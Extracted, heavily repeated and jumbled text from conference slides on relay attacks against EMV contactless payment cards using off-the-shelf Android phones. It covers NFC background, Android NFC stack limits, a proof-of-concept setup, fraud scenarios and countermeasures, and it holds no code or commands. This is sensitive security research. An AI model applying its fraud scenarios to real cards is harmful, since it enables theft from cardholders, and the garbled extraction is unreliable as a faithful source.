Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
